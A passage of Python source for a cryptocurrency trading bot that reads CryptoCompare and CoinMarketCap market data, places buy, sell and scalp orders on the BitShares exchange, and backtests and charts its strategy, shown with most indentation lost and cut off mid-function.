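# Usage sketch: a single 2h-candle request in the same form chartdata2()
# builds above. The endpoint and parameter names (fsym, tsym, limit,
# aggregate, toTs) are taken from the code above; 2000 is the per-call
# candle limit it works around by paging backwards with toTs.
import time
import requests

def _example_histohour(fsym='BTS', tsym='BTC', period=7200, limit=500):
    '''Fetch `limit` aggregated hourly candles ending now.'''
    uri = 'https://min-api.cryptocompare.com/data/histohour'
    params = {'fsym': fsym, 'tsym': tsym, 'limit': limit,
              'aggregate': int(period / 3600), 'toTs': int(time.time())}
    data = requests.get(uri, params=params).json()['Data']
    return [candle for candle in data if candle['close'] > 0]
# ----------------------------------------------------------------------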
def currencies(): # Public API cryptocompare
try:
uri = 'https://min-api.cryptocompare.com/data/all/coinlist'
params = {}
ret = requests.get(uri, params=params).json()
print(('API currencies', len(ret['Data']),
'coins at cryptocompare'))
return ret['Data']
except Exception as e:
msg = msg_(e)
race_append(doc='EV_log.txt', text=msg)
print ('currencies() failed; skipping...')
return {}
def cryptocompare_time(): # CEX latency test
try:
# print('Cryptocompare API candle time')
uri = 'https://www.cryptocompare.com/api/data/coinsnapshot'
params = {'fsym': ASSET, 'tsym': CURRENCY}
ret = requests.get(uri, params=params).json()
timestamps = []
for i in range(len(ret['Data']['Exchanges'])):
timestamps.append(float(
ret['Data']['Exchanges'][i]['LASTUPDATE']))
cc_time = max(timestamps)
latency = time.time() - cc_time
print(('candle latency :', ('%.2f' % latency)))
return latency
except Exception as e:
msg = msg_(e)
race_append(doc='EV_log.txt', text=msg)
print ('cryptocompare_time() failed; skipping...')
return -1
def cryptocompare_last(): # CEX last price
connected = 0
while not connected:
try:
# print('Cryptocompare API last')
uri = 'https://min-api.cryptocompare.com/data/pricemultifull'
params = {'fsyms': ASSET, 'tsyms': CURRENCY}
ret = requests.get(uri, params=params).json()
raw = ret['RAW'][ASSET][CURRENCY]
price = float(raw['PRICE'])
volume = float(raw['LASTVOLUME'])
cc_time = float(raw['LASTUPDATE'])
latency = time.time() - cc_time
print(('cex_rate latency :', ('%.2f' % latency)))
connected = 1
return price, volume, latency
except Exception as e:
msg = msg_(e)
race_append(doc='EV_log.txt', text=msg)
print ('cryptocompare_last() failed; try again...')
time.sleep(5)
pass
def marketcap(): # Public API coinmarketcap
try:
asset_cap = asset_dominance = asset_rank = 0
print('API marketcap')
uri = 'https://api.coinmarketcap.com/v1/ticker/'
params = {'limit': 0}
caps = requests.get(uri, params=params).json()
asset_cap = 0
total_cap = 0
for c in caps:
if c['market_cap_usd'] is None:
cap = 0
else:
cap = float(c['market_cap_usd']) / 1000000.0
if c['symbol'] == ASSET:
asset_cap = cap
asset_rank = c['rank']
total_cap += cap
asset_dominance = 100 * asset_cap / total_cap
return asset_cap, asset_dominance, asset_rank
except Exception as e:
msg = msg_(e)
race_append(doc='EV_log.txt', text=msg)
print ('marketcap() failed; skip...')
return 999,999,999
# LIVE
# ======================================================================
def live_initialize(): # Begin live session
print(VERSION)
print('~====== BEGIN LIVE SESSION =====================~')
global storage
global portfolio
global info
global data
info = {}
data = {}
portfolio = {}
if STORAGE_RESET:
storage = {}
# initialize storage
storage['trades'] = 0
storage['HFT'] = False
storage['previous_v'] = SATOSHI
# initialize info
info['begin'] = int(time.time())
info['tick'] = 0
info['five_minute'] = 0
info['hour'] = 0
info['day'] = 0
info['current_time'] = info['begin']
info['completion_time'] = info['begin'] - 60
info['end'] = None
info['live'] = True
live_chart_latest()
plot_format()
def live(): # Primary live event loop
global storage
global info
live_initialize()
attempt = 0
msg = ''
while True:
plt.pause(1) # prevent inadvertent attack on API's
info['current_time'] = now = int(time.time())
print('')
print(('______________________________%s_cex %s_dex %s' %
(ASSET, BitASSET, time.ctime())))
print('')
# DEBUG LIVE SESSION
debug = 0
if debug:
print('$$$$$$$$$$$$$$$$$$')
print('WARN: DEBUG - RUNTIME: %s' % (info['current_time']-info['begin']))
print('$$$$$$$$$$$$$$$$$$')
print('')
print('WATCHDOG LATENCY:', watchdog())
price, volume, latency = cryptocompare_last()
storage['cc_last'] = {
'price': price, 'volume': volume, 'latency': latency}
cryptocompare_time()
live_data()
indicators()
state_machine()
hourly()
daily()
trade()
scalp()
live_chart()
plot_format()
live_plot()
time.sleep(10)
info['tick'] += 1
else:
print('')
print('RUNTIME: %s' % (info['current_time']-info['begin']))
print('')
print('WATCHDOG LATENCY:', watchdog())
print('')
# RAISE ALARM
if attempt > 2:
time_msg = datetime.fromtimestamp(
now).strftime('%H:%M')
print(
('%s FAIL @@@@@@@ ATTEMPT: %s %s' %
(msg, attempt, time_msg)))
if BELL:
bell(attempt, 432)
# GATHER AND POST PROCESS DATA
try:
price, volume, latency = cryptocompare_last()
storage['cc_last'] = {
'price': price, 'volume': volume, 'latency': latency}
except:
msg += 'cryptocompare_last() '
attempt += 1
continue
try:
cryptocompare_time()
except:
msg += 'cryptocompare_time() '
attempt += 1
continue
print('')
try:
live_data()
except:
msg += 'live_data() '
attempt += 1
continue
try:
indicators()
except:
msg += 'indicators() '
attempt += 1
continue
try:
state_machine()
except:
msg += 'state_machine() '
attempt += 1
continue
# LOWER FREQUENCY EVENTS
check_hour = (info['current_time'] - info['begin']) / 3600.0
if check_hour > info['hour']:
try:
hourly()
info['hour'] += 1
except:
msg += 'hourly() '
attempt += 1
continue
check_day = (info['current_time'] - info['begin']) / 86400.0
if check_day > info['day']:
try:
daily()
info['day'] += 1
except:
msg += 'daily() '
attempt += 1
continue
# TRADE
try:
trade()
except:
msg += 'trade() '
attempt += 1
continue
# SCALP
try:
scalp()
except:
msg += 'scalp() '
attempt += 1
continue
# PLOT
try:
live_chart()
except:
msg += 'live_chart() '
attempt += 1
continue
try:
plot_format()
except:
msg += 'plot_format() '
attempt += 1
continue
try:
live_plot()
except:
msg += 'live_plot() '
attempt += 1
continue
# END PRIMARY TICK
msg = ''
print('tick', info['tick'])
info['tick'] += 1
info['completion_time'] = int(time.time())
attempt = 0
# DELAY NEXT TICK
if storage['HFT']:
print('HFT True')
set_timing()
else:
plt.pause(300)
def set_timing(): # Limit HFT to one tick per TICK interval, aligned to TICK_TIMING
now = time.time()
elapsed = now - info['begin']
minutes = math.floor(elapsed / TICK)
tick_elapsed = now - info['completion_time']
if (info['tick'] + 1) > minutes:
wait = max(0, (TICK_TIMING - (time.time() % TICK)))
print(('standard wait: %.2f' % wait))
if wait > 0:
plt.pause(wait)
elif tick_elapsed < TICK_MINIMUM:
wait = TICK_MINIMUM - tick_elapsed
print(('minimum wait: %.2f' % wait))
if wait > 0:
plt.pause(wait)
else:
print ('skip set_timing(); no wait')
drift = ((time.time() - info['begin']) - info['tick'] * TICK -
TICK_TIMING + info['begin'] % TICK)
drift_minutes = int(drift // TICK)
print(('drift: %.6f drift minutes %s' % (drift, drift_minutes)))
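# ----------------------------------------------------------------------
# Illustrative sketch: the "standard wait" branch above sleeps until
# TICK_TIMING seconds past the next TICK boundary, pinning every HFT
# pass to the same second of each interval. The wait calculation alone:
import time

def _example_wait_until_tick(tick=300, tick_timing=51):
    '''Seconds to sleep so the next pass lands tick_timing s into a tick.'''
    return max(0, tick_timing - (time.time() % tick))
# ----------------------------------------------------------------------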
def live_data(): # Gather live data from public and private api
global portfolio
global data
global storage
'*************************************'
metaNODE = Bitshares_Trustless_Client()
'*************************************'
orders = metaNODE['orders']
dex_rate = storage['dex_rate'] = float(metaNODE['last'])
book = storage['book'] = metaNODE['book']
portfolio['currency'] = float(metaNODE['currency_balance'])
portfolio['assets'] = float(metaNODE['asset_balance'])
# orderbook and last price
book = metaNODE['book']
sbids = [('%.8f' % i) for i in book['bidp'][:3]]
sbids = sbids[::-1]
sasks = [('%.8f' % i) for i in book['askp'][:3]]
print (sbids, 'BIDS <> ASKS', sasks)
# populate 2h candles, 5m candles, and market rate
data['7200'] = live_candles(PAIR, candle=7200, depth=int(MA2 * 13))
data['300'] = live_candles(PAIR, candle=300, depth=300)
cex_rate = storage['cex_rate'] = storage['cc_last']['price']
print('')
print(('cex_rate: ', ('%.8f' % cex_rate)))
print(('dex_rate: ', ('%.8f' % dex_rate)))
print(('delta : ', ('%.8f' % (cex_rate - dex_rate))))
print('')
def scalp(): # Initiate secondary order placement
# localize data
global storage
now = int(time.time())
'*************************************'
metaNODE = Bitshares_Trustless_Client()
'*************************************'
book = metaNODE['book']
ask_p = book['askp'][0]
ask_v = book['askv'][0]
bid_p = book['bidp'][0]
bid_v = book['bidv'][0]
ask_p2 = book['askp'][1]
bid_p2 = book['bidp'][1]
cex_rate = storage['cex_rate']
dex_rate = storage['dex_rate']
assets = portfolio['assets']
buying = storage['buying']
selling = storage['selling']
high = storage['high']
low = storage['low']
asset_ratio = storage['asset_ratio']
currency = portfolio['currency']
means = storage['means']
ma3 = storage['ma3'][-1]
ma4 = storage['ma4'][-1]
market_cross = storage['market_cross']
asset_ratio = storage['asset_ratio']
mid_market = storage['mid_market']
max_currency = storage['max_currency']
max_assets = storage['max_assets']
# define scalp support and resistance
scalp_resistance = max(high, ma3, ma4)
scalp_support = min(low, ma3, ma4)
# limit scalp ops to buying/selling window
max_scalp_support = ((1 - MIN_MARGIN) * selling) # 97% of selling
min_scalp_resistance = ((1 + MIN_MARGIN) * buying) # 103% of buying
scalp_support = min(scalp_support, max_scalp_support)
scalp_resistance = max(scalp_resistance, min_scalp_resistance)
# limit scalp ops to dex bid/ask
scalp_resistance = max(scalp_resistance, bid_p)
scalp_support = min(scalp_support, ask_p)
# adjust scalp margins if too thin
scalp_margin = (scalp_resistance - scalp_support) / scalp_support
if scalp_margin < MIN_MARGIN:
midscalp = (scalp_resistance + scalp_support)/2
scalp_resistance = (1 + MIN_MARGIN / 2) * midscalp
scalp_support = (1 - MIN_MARGIN / 2) * midscalp
# store scalp thresholds globally
storage['scalp_resistance'] = scalp_resistance
storage['scalp_support'] = scalp_support
# update portfolio assets and currency
'*************************************'
metaNODE = Bitshares_Trustless_Client()
'*************************************'
currency = portfolio['currency'] = float(metaNODE['currency_balance'])
assets = portfolio['assets'] = float(metaNODE['asset_balance'])
# means to buy and percent invested
means = storage['means'] = currency / cex_rate
max_assets = storage['max_assets'] = (assets + means)
storage['max_currency'] = max_assets * cex_rate
invested = assets / max_assets
holding = storage['holding']
if holding: # primary trade() function
max_holding = 1
min_holding = 1-SCALP_FUND
else:
max_holding = SCALP_FUND
min_holding = 0
buy_qty = max(0, max_assets * (max_holding-invested))
sell_qty = max(0, max_assets * (invested - min_holding))
pieces = SCALP_PIECES
pie = []
for i in range (pieces):
pie.append(random())
total = sum(pie)
for i in range (pieces):
pie[i] = pie[i]/total
if SCALP:
print('')
print('begin scalp ops')
print('')
print('assets ', satoshi_str(assets))
print('currency ', satoshi_str(currency))
print('means ', satoshi_str(means))
print('max assets ', satoshi_str(max_assets))
print('max currency ', satoshi_str(max_currency))
print('holding ', holding)
print('max_holding ', max_holding)
print('min holding ', min_holding)
print('buy qty ', buy_qty)
print('sell_qty ', sell_qty)
print('scalp s ', satoshi_str(scalp_support))
print('scalp r ', satoshi_str(scalp_resistance))
print('pieces ', pieces, pie)
print('')
for i in range(pieces):
# SCALP BUY
print('')
qty = buy_qty*pie[i]
scalp = scalp_support - i *2*random()*SATOSHI
try:
print(('scalp buy', satoshi_str(qty), 'at', satoshi_str(scalp)))
dex_auth('buy', price=scalp, amount=qty)
except:
pass
# SCALP SELL
print('')
qty = sell_qty*pie[i]
scalp = scalp_resistance + i *2*random()*SATOSHI
try:
print(('scalp sell', satoshi_str(qty), 'at', satoshi_str(scalp)))
dex_auth('sell', price=scalp, amount=qty)
except:
pass
# Print trade pair and time
time_LOCAL = datetime.fromtimestamp(
int(time.time())).strftime('%H:%M:%S')
time_UTC = datetime.fromtimestamp(
int(time.time()) + 18000).strftime('%H:%M:%S')
print(('%.2f %s %.2f %s' % (currency, CURRENCY, assets, ASSET)))
print(('%s UTC %s' %
(time_UTC, time_LOCAL)))
print(('(buying: %.8f selling %.8f) (scalp buy %.8f, scalp sell %.8f)' %
(buying, selling, scalp_support, scalp_resistance)))
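# ----------------------------------------------------------------------
# Illustrative sketch: the iceberg split above draws SCALP_PIECES random
# weights and normalizes them so the pieces sum to the full quantity,
# giving each scalp order a random size. The split in isolation:
from random import random

def _example_random_split(total_qty, pieces=4):
    '''Split total_qty into `pieces` random parts that sum to total_qty.'''
    weights = [random() for _ in range(pieces)]
    scale = sum(weights)
    return [total_qty * weight / scale for weight in weights]
# ----------------------------------------------------------------------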
def trade(): # Initiate primary order placement
global storage
# localize data
buying = storage['buying']
selling = storage['selling']
mid_market = storage['mid_market']
market_cross = storage['market_cross']
buying_r = buying
selling_r = selling
if info['live']: # localize additional data for live session
book = storage['book']
storage['recycle_trigger'] = False
ask_p = book['askp'][0]
bid_p = book['bidp'][0]
dex_rate = storage['dex_rate']
cex_rate = storage['cex_rate']
assets = portfolio['assets']
currency = portfolio['currency']
asset_ratio = storage['asset_ratio']
means = storage['means']
invested = portfolio['percent_invested']
divested = portfolio['percent_divested']
min_order = 0.00011 / dex_rate
dex_auth('cancel')
max_assets = (MAX_ASSETS / 100.0) * (assets + (currency / dex_rate))
max_currency = (MAX_CURRENCY / 100.0) * (currency + (assets * dex_rate))
print(('assets %.1f, max assets %.1f' % (assets, max_assets)))
pieces = 10.0 # order size
if MANUAL_OVERRIDE:
storage['selling'] = selling = MANUAL_SELL
storage['buying'] = buying = MANUAL_BUY
storage['HFT'] = False
if SCALP or RECYCLE:
storage['HFT'] = True
if ORDER_TEST:
dex_auth('buy', price=0.9*dex_rate, amount=1)
dex_auth('sell', price=1.1*dex_rate, amount=1)
if dex_rate > selling:
storage['holding'] = False
if dex_rate < buying:
storage['holding'] = True
qty = max_assets / pieces
if (dex_rate > 0.90 * selling):
print('APPROACHING SELL POINT')
if BELL:
bell(0.5, 800)
if (portfolio['assets'] > 0.1):
if (divested < MAX_CURRENCY):
storage['HFT'] = True
selling_r = max(selling, (dex_rate + ask_p) / 2)
try:
# iceberg
print(
('SELLING', PAIR, 'RATE', ('%.8f' %
selling_r), 'AMOUNT', ('%.1f' %
qty)))
dex_auth('sell', price=selling_r, amount=qty)
# iceberg front limit
selling_r *= 1.0 - 0.015*random()
qty /= randint(69,99)
if random() > 0.5:
print(
('SELLING MINI', PAIR, 'RATE', ('%.8f' %
selling_r), 'AMOUNT', ('%.1f' %
qty)))
dex_auth('sell', price=selling_r, amount=qty)
except:
print('SELL FAILED')
pass
else:
print('MAX DIVESTED')
else:
print('NO ASSETS')
qty = max_assets / pieces
if dex_rate < 1.20 * buying:
print('APPROACHING BUY POINT')
if BELL:
bell(0.5, 800)
if (portfolio['currency'] > 0.1):
if (invested < MAX_ASSETS):
storage['HFT'] = True
buying_r = min(buying, (dex_rate + bid_p) / 2)
try:
print(
('BUYING', PAIR, 'RATE', ('%.8f' %
buying_r), 'AMOUNT', ('%.1f' %
qty)))
dex_auth('buy', price=buying_r, amount=qty)
buying_r *= 1.0 + 0.015*random()
qty /= randint(69,99)
if random() > 0.5:
print(
('BUYING MINI', PAIR, 'RATE', ('%.8f' %
buying_r), 'AMOUNT', ('%.1f' %
qty)))
dex_auth('buy', price=buying_r, amount=qty)
except:
print('buy FAIL')
pass
else:
print('MAX INVESTED')
else:
print ('NO CURRENCY')
else:
# test trade
if portfolio['currency'] > 0:
if (storage['low'][-1] < buying):
buying_r = min(storage['high'][-1], buying)
test_buy(buying_r)
elif portfolio['assets'] > 0:
if storage['high'][-1] > selling:
selling_r = max(storage['low'][-1], selling)
test_sell(selling_r)
def hourly(): # Do this every hour
now = int(time.time())
cex_rate = storage['cex_rate']
print(('hour: %s' % info['hour']))
plt.plot(now, cex_rate, markersize=5, marker='.',
color='white', label='daily')
def daily(): # Do this every day
now = int(time.time())
cex_rate = storage['cex_rate']
print(('day: %s' % info['day']))
plt.plot(now, cex_rate, markersize=10, marker='.',
color='white', label='daily')
# BACKTEST
# ======================================================================
def initialize(): # Open plot, set backtest days
global DAYS
if MODE == 0:
print('~=== OPTIMIZING 1D CANDLES =================~')
if MODE == 1:
print('~=== BEGIN BACKTEST 1D CANDLES =============~')
if MODE == 2:
print('~=== WARMING UP PAPER SESSION 2H CANDLES ===~')
if MODE == 3:
print('')
print('')
print('NOTE: THIS IS ALPHA RELEASE TO PUBLIC DOMAIN WITH NO WARRANTY')
print('')
print('')
print('~=== WARMING UP LIVE MACHINE 2H CANDLES ====~')
if MODE == 4:
print('~=== BEGIN SALES BACKTEST 1D CANDLES =======~')
if MODE in [2,3]:
print('This will require a cpu core and 2.5 gigs RAM for a few minutes...')
if MODE == 6:
print('~=== BEGIN LIVE BUY/SELL/CANCEL TEST =======~')
if LIVE:
DAYS = 90
watchdog()
dex_auth('cancel')
else:
DAYS = len(chartdata(PAIR, 1390000000, int(time.time()), 86400))
if ASSET == 'BTS': # filter glitch in dataset
DAYS -= 250
if CURRENCY == 'BITCNY':
DAYS -= 200
elif ASSET == 'DASH': # filter glitch in dataset
DAYS -= 360
elif ASSET == 'NXT': # filter glitch in dataset
DAYS -= 300
else:
DAYS -= 100
if (SALES or OPTIMIZE) and (DAYS >= 365):
DAYS = 365
if LIVE or BACKTEST:
plt.ion()
fig = plt.figure()
fig.patch.set_facecolor('0.15')
fig.canvas.set_window_title(VERSION)
def holdings(): # Calculate starting portfolio
if info['tick'] == 0:
close = data['close'][-DAYS]
else:
close = storage['close'][-1]
storage['max_assets'] = (portfolio['assets'] +
(portfolio['currency'] / close))
storage['max_currency'] = (portfolio['currency'] +
(portfolio['assets'] * close))
if info['tick'] == 0:
storage['begin_max_assets'] = storage['max_assets']
storage['begin_max_currency'] = storage['max_currency']
storage['start_price'] = close
def test_initialize(): # Begin backtest session
now = int(time.time())
global storage
global portfolio
global info
global data
# initialize storage
storage['trades'] = 0
storage['buys'] = [[], []]
storage['sells'] = [[], []]
storage['holding'] = True
# initialize portfolio balances
portfolio['assets'] = float(START_ASSETS)
portfolio['currency'] = float(START_CURRENCY)
# initialize info dictionary objects
info['begin'] = now - DAYS * 86400
info['end'] = now
info['tick'] = 0
info['current_time'] = info['begin']
info['origin'] = info['begin'] - int(1.1 * MA2 * 86400)
info['live'] = False
print(('Dataset.....: %s DAYS' %
int((now - info['origin']) / 86400.0)))
print(('Backtesting.: %s DAYS' %
int((now - info['begin']) / 86400.0)))
# check for compatible interval
if CANDLE not in [300, 900, 1800, 7200, 14400, 86400]:
print(('Tick Interval must be in [300, 900,' +
'1800, 7200, 14400, 86400]'))
raise stop()
# gather complete data set for backtest
if LIVE or BACKTEST:
# print(((now - info['origin']) / float(CANDLE)))
data = backtest_candles(PAIR, info['origin'], now, CANDLE)
# print(CANDLE)
# print((len(data['unix']), (data['unix'][1] - data['unix'][0])))
# print((min(data['unix']), time.ctime(min(data['unix'])), 'mindate'))
# print((info['origin'], time.ctime(info['origin']), 'origin'))
print('')
print(('PAIR......: %s' % PAIR))
print(('BitPAIR...: %s' % BitPAIR))
print('')
print(('CANDLE....: %s' % CANDLE))
# print(('ORIGIN....: %s %s' % (info['origin'],
# time.ctime(info['origin']))))
# print(('BEGIN.....: %s %s' % (info['begin'],
# time.ctime(info['begin']))))
plot_format()
if LIVE:
test_chart_latest()
def backtest(): # Primary backtest event loop; the cost function
#===================================================================
''' BACKTEST EVENT LOOP '''
#===================================================================
global storage
while True:
# print(info['current_time'], 'current_time')
# print(info['end'], 'end')
if info['current_time'] < info['end']:
# print info['current_time'], time.ctime(info['current_time'])
# print (data)
# print (len(data['unix']))
# print (data)
# print (info['current_time'])
data_slice = slice_candles(info['current_time'], data)
storage['high'] = data_slice['high']
storage['low'] = data_slice['low']
storage['open'] = data_slice['open']
storage['close'] = data_slice['close']
holdings()
indicators()
state_machine()
trade()
if LIVE or BACKTEST:
test_chart()
info['current_time'] += CANDLE
info['tick'] += 1
else:
test_stop()
if LIVE or BACKTEST:
test_plot()
plt.pause(0.0001)
if BACKTEST:
plt.ioff()
try:
plot_format()
except:
pass
plt.show()
break
def test_buy(price): # Execute a backtest buy
storage['trades'] += 1
now = time.ctime(info['current_time'])
storage['buys'][0].append(info['current_time'])
storage['buys'][1].append(price)
portfolio['assets'] = portfolio['currency'] / price
storage['holding'] = True
if LIVE or BACKTEST:
plot_text()
if storage['market_cross'] is True:
call = 'BULL SUPPORT'
else:
call = 'BEAR DESPAIR'
print(('[%s] %s BUY %s %.2f %s at %s sat value %.2f %s' %
(now, storage['trades'], call,
portfolio['assets'], ASSET,
int(price * ANTISAT), portfolio['currency'], CURRENCY)))
plt.plot(info['current_time'], (price), markersize=10,
marker='^', color='lime', label='buy')
portfolio['currency'] = 0
if LIVE:
plt.pause(0.0001)
watchdog()
def test_sell(price): # Execute a backtest sell
storage['trades'] += 1
now = info['current_time']
storage['sells'][0].append(info['current_time'])
storage['sells'][1].append(price)
portfolio['currency'] = portfolio['assets'] * price
storage['holding'] = False
if LIVE or BACKTEST:
plot_text()
plt.plot(info['current_time'], (price), markersize=10,
marker='v', color='coral', label='sell')
if storage['market_cross'] is True:
call = 'BULL OVERBOUGHT'
else:
call = 'BEAR RESISTANCE'
if storage['buys'][1]: # guard: only draw a win/loss line if there was a prior buy
buy_price = storage['buys'][1][-1]
buy_time = storage['buys'][0][-1]
if price > buy_price:
plt.plot((buy_time, now), (buy_price, price),
color='lime', label='win', lw=2)
else:
plt.plot((buy_time, now), (buy_price, price),
color='coral', label='loss', lw=2)
print(('[%s] %s SELL %s %.2f %s at %s sat value %.2f %s' %
(time.ctime(now), storage['trades'], call,
portfolio['assets'], ASSET,
int(price * ANTISAT), portfolio['currency'], CURRENCY)))
portfolio['assets'] = 0
if LIVE:
plt.pause(0.0001)
watchdog()
# PLOT, PRINT, ALARM
# ======================================================================
def draw_state_machine( # Plots primary trade indications
now, selloff, support, resistance, despair,
buying, selling, min_cross, max_cross,
market_cross, ma2):
if not SALES:
if market_cross:
plt.plot((now, now), (selloff, support),
color='lime', label='state', alpha=0.2)
plt.plot((now, now), (resistance, despair),
color='darkorchid', label='state', alpha=0.2)
else:
plt.plot((now, now), (resistance, despair),
color='red', label='state', alpha=0.2)
plt.plot((now, now), (selloff, support),
color='darkorchid', label='state', alpha=0.2)
plt.plot((now, now), ((max_cross), (min_cross)),
color='white', label='cross', alpha=1.0)
plt.plot(now, (ma2), markersize=6, marker='.',
color='aqua', label='ma2')
plt.plot(now, max_cross, markersize=3, marker='.',
color='white', label='cross')
plt.plot(now, min_cross, markersize=3, marker='.',
color='white', label='cross')
# plot market extremes
plt.plot(now, selloff, markersize=3, marker='.',
color='darkorchid', label='selloff')
plt.plot(now, despair, markersize=3, marker='.',
color='darkorchid', label='despair')
plt.plot(now, resistance, markersize=3, marker='.',
color='darkorchid', label='resistance')
plt.plot(now, support, markersize=3, marker='.',
color='darkorchid', label='support')
plt.plot(now, buying, markersize=6, marker='.',
color='lime', label='buying')
plt.plot(now, selling, markersize=6, marker='.',
color='red', label='selling')
def test_rechart_orders(): # Set buy/sell markers on top
for i in range(len(storage['sells'][0])):
plt.plot(storage['sells'][0][i], (storage['sells'][1][i]),
markersize=10, marker='v', color='coral', label='sell')
for i in range(len(storage['buys'][0])):
plt.plot(storage['buys'][0][i], (storage['buys'][1][i]),
markersize=10, marker='^', color='lime', label='buy')
chart_star()
plt.pause(0.001)
def live_chart_latest(): # Plot last 24hrs of 5m candles
now = int(time.time())
days = 1
candle = 300
d = backtest_candles(PAIR, (now - days * 86400), now, candle)
high = d['high']
low = d['low']
close = d['close']
unix = d['unix']
for i in range(len(unix)):
now = unix[i]
if low[i] < close[i]:
plt.plot(now, low[i], markersize=6, marker='.',
color='m', label='low')
if high[i] > close[i]:
plt.plot(now, high[i], markersize=6, marker='.',
color='m', label='high')
plt.plot(now, close[i], markersize=2, marker='.',
color='y', label='close')
plt.pause(0.001)
def test_chart_latest(): # Plot high resolution end of backtest
# plot 1 day of 5m candles
days = 1
candle = 300
d = backtest_candles(
PAIR, (info['end'] - days * 86400), info['end'], candle)
high = d['high']
low = d['low']
close = d['close']
unix = d['unix']
for i in range(len(unix)):
now = unix[i]
if low[i] < close[i]:
plt.plot((now), (high[i]), markersize=4, marker='.',
color='m', label='high')
if high[i] > close[i]:
plt.plot((now), (low[i]), markersize=4, marker='.',
color='m', label='low')
plt.plot((now), (close[i]), markersize=4, marker='.',
color='y', label='close')
# plot last 30 days of 2h
days = 30
candle = 7200
d = backtest_candles(
PAIR, (info['end'] - days * 86400), info['end'], candle)
high = d['high']
low = d['low']
close = d['close']
unix = d['unix']
for i in range(len(unix)):
now = unix[i]
if low[i] < close[i]:
plt.plot((now), (high[i]), markersize=4, marker='.',
color='m', label='high')
if high[i] > close[i]:
plt.plot((now), (low[i]), markersize=4, marker='.',
color='m', label='low')
plt.plot((now), (close[i]), markersize=4, marker='.',
color='y', label='close')
plt.pause(0.001)
def test_chart(): # Add objects to backtest plot
# localize data
now = info['current_time']
ma1 = storage['ma1'][-1]
ma2 = storage['ma2'][-1]
close = storage['close']
high = storage['high']
low = storage['low']
selloff = storage['selloff']
despair = storage['despair']
resistance = storage['resistance']
support = storage['support']
max_cross = storage['max_cross']
min_cross = storage['min_cross']
market_cross = storage['market_cross']
buying = storage['buying']
selling = storage['selling']
draw_state_machine(now, selloff, support,
resistance, despair, buying, selling,
min_cross, max_cross, market_cross, ma2)
# plot candles
plt.plot((now, now), ((high[-1]), (low[-1])),
color='m', label='high_low', alpha=0.5)
plt.plot(now, (close[-1]), markersize=4, marker='.',
color='y', label='close')
if info['tick'] == 0:
chart_star()
def live_chart(): # Add objects to live plot
book = storage['book']
cex_rate = storage['cex_rate']
dex_rate = storage['dex_rate']
m_volume = storage['m_volume']
ma1 = storage['ma1'][-1]
ma2 = storage['ma2'][-1]
ma3 = storage['ma3'][-1]
ma4 = storage['ma4'][-1]
selloff = storage['selloff']
despair = storage['despair']
resistance = storage['resistance']
support = storage['support']
buying = storage['buying']
selling = storage['selling']
ask = book['askp'][0]
bid = book['bidp'][0]
scalp_resistance = storage['scalp_resistance']
scalp_support = storage['scalp_support']
max_cross = storage['max_cross']
min_cross = storage['min_cross']
market_cross = storage['market_cross']
now = info['current_time']
high = storage['high']
low = storage['low']
# plot state machine
draw_state_machine(now, selloff, support,
resistance, despair, buying, selling,
min_cross, max_cross, market_cross, ma2)
plt.plot(now, high,
markersize=3, marker='.', color='m', label='high')
plt.plot(now, low,
markersize=3, marker='.', color='m', label='low')
plt.plot(now, scalp_resistance, markersize=4, marker='.',
color='tomato', label='scalp_resistance')
plt.plot(now, scalp_support, markersize=4, marker='.',
color='palegreen', label='scalp_support')
plt.plot(now, ask, markersize=3, marker='.',
color='aqua', label='ask')
plt.plot(now, bid, markersize=3, marker='.',
color='aqua', label='bid')
plt.plot(now, dex_rate, markersize=4 * m_volume, marker='.',
color='khaki', label='dex_rate')
plt.plot(now, cex_rate, markersize=4 * m_volume, marker='.',
color='yellow', label='cex_rate')
if info['tick'] == 0:
# clone the backtest in higher resolution for last 24hrs
plt.plot((now, now), (selloff, despair),
color='white', label='vertical start', lw=5, alpha=0.2)
ma1_period = MA1 * 86400 / 7200.0
ma2_period = MA2 * 86400 / 7200.0
ma1_arr = float_sma(data['7200']['close'], ma1_period)
ma2_arr = float_sma(data['7200']['close'], ma2_period)
unix = data['7200']['unix']
for i in range(-1, -20, -1):
for z in range(0, 7200, 300):
try:
now = unix[i] + z
ma1 = ma1_arr[i]
ma2 = ma2_arr[i]
# state machine clone
min_cross = MIN_CROSS * ma1
max_cross = MAX_CROSS * min_cross
bull_stop = BULL_STOP * ma2
bear_stop = BEAR_STOP * ma2
selloff = SELLOFF * ma1
despair = DESPAIR * ma1
support = max((SUPPORT * ma1), bull_stop)
resistance = min((RESISTANCE * ma1), bear_stop)
if market_cross:
selling = selloff
buying = support
else:
buying = despair
selling = resistance
# plot state machine
draw_state_machine(now, selloff, support,
resistance, despair, buying, selling,
min_cross, max_cross, market_cross, ma2)
except:
print ('plot ma_arr failed')
pass
chart_star()
plt.pause(0.001)
def chart_star(): # Plot a star at begin and end of backtest
now = info['current_time']
if info['live']:
cex_rate = storage['cex_rate']
else:
cex_rate = (storage['close'][-1])
plt.plot(now, cex_rate, markersize=50,
marker='1', color='w', label='cex_rate')
plt.plot(now, cex_rate, markersize=40,
marker='2', color='y', label='cex_rate')
plt.plot(now, cex_rate, markersize=40,
marker='3', color='w', label='cex_rate')
plt.plot(now, cex_rate, markersize=50,
marker='4', color='y', label='cex_rate')
plt.plot(now, cex_rate, markersize=15,
marker='.', color='y', label='cex_rate')
def plot_format(): # Set plot colors and attributes
warnings.filterwarnings("ignore", category=cbook.mplDeprecation)
ax = plt.gca()
ax.patch.set_facecolor('0.1')
ax.yaxis.tick_right()
ax.spines['bottom'].set_color('0.5')
ax.spines['top'].set_color(None)
ax.spines['right'].set_color('0.5')
ax.spines['left'].set_color(None)
ax.tick_params(axis='x', colors='0.7', which='both')
ax.tick_params(axis='y', colors='0.7', which='both')
ax.yaxis.label.set_color('0.9')
ax.xaxis.label.set_color('0.9')
plt.minorticks_on() # must be called to take effect
plt.grid(b=True, which='major', color='0.2', linestyle='-')
plt.grid(b=True, which='minor', color='0.2', linestyle='-')
if (info['live'] is False) and (info['tick'] > 1):
plt.ylabel('LOGARITHMIC PRICE SCALE')
plt.yscale('log')
if info['live'] is True:
plt.ylabel('MARKET PRICE')
ax.yaxis.set_major_formatter(matplotlib.ticker.ScalarFormatter())
ax.yaxis.set_minor_formatter(matplotlib.ticker.ScalarFormatter())
ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter("%.8f"))
ax.yaxis.set_minor_formatter(matplotlib.ticker.FormatStrFormatter("%.8f"))
if info['live']:
stepsize = 3600
else:
if DAYS > 100:
stepsize = 2592000
elif DAYS > 20:
stepsize = 864000
else:
